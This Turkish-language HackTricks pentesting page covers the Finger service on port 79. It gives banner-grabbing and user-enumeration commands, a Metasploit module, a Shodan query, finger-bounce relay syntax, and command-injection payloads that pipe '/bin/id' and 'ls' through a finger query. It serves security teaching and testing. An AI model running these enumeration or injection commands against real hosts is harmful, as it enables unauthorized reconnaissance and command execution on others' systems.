hacktricks/network-services-pentesting/pentesting-finger.md

5.3 KiB
Raw Permalink Blame History

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Web uygulamalarınız, ağınız ve bulutunuz hakkında bir hacker perspektifi edinin

Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açıklarını bulun ve raporlayın. Saldırı yüzeyini haritalamak, ayrıcalıkları artırmanıza izin veren güvenlik sorunlarını bulmak ve temel kanıtları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracımızı kullanın, böylece sıkı çalışmanızı ikna edici raporlara dönüştürebilirsiniz.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Temel Bilgiler

Finger programı/hizmeti, bilgisayar kullanıcıları hakkında ayrıntılar almak için kullanılır. Genellikle sağlanan bilgiler kullanıcının giriş adı, tam adı ve bazı durumlarda ek ayrıntıları içerir. Bu ek ayrıntılar, ofis konumu ve telefon numarasını (varsa), kullanıcının giriş yaptığı zamanı, hareketsizlik süresini (boşta kalma süresi), kullanıcının en son okuduğu e-posta zamanını ve kullanıcının plan ve proje dosyalarının içeriğini kapsayabilir.

Varsayılan port: 79

PORT   STATE SERVICE
79/tcp open  finger

Numaralandırma

Afiş Yakalama/Temel Bağlantı

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Kullanıcı numaralandırma

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatif olarak, pentestmonkey sitesinden finger-user-enum kullanabilirsiniz, bazı örnekler:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap, varsayılan betikleri kullanarak bir betik çalıştırır

Metasploit, Nmap'tan daha fazla hile kullanır

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Komut yürütme

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Bir sistemi finger relay olarak kullanın

finger user@host@victim
finger @internal@external

Web uygulamalarınız, ağınız ve bulutunuz hakkında bir hacker perspektifi edinin

Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açıklarını bulun ve raporlayın. Saldırı yüzeyini haritalamak, ayrıcalıkları artırmanıza izin veren güvenlik sorunlarını bulmak ve temel kanıtları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracımızı kullanın, böylece sıkı çalışmanızı ikna edici raporlara dönüştürebilirsiniz.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %}